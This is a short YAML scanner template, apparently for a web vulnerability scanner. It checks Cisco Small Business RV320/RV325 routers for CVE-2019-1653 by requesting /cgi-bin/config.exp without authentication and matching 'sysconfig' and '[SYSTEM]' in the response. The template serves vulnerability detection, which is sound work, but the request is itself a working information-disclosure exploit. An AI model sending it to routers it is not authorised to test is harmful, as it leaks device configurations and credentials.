id: cisco-wan-vpn-rce
info:
  name: Cisco Small Business WAN VPN Routers Sensitive Info Disclosure (cve-2019-1653)
  risk: High

params:
  - root: "{{.BaseURL}}"

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/cgi-bin/config.exp
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("body", "sysconfig") && StringSearch("body", "[SYSTEM]")


reference:
  - links:
    - https://seclists.org/fulldisclosure/2019/Jan/52
    - https://github.com/0x27/CiscoRV320Dump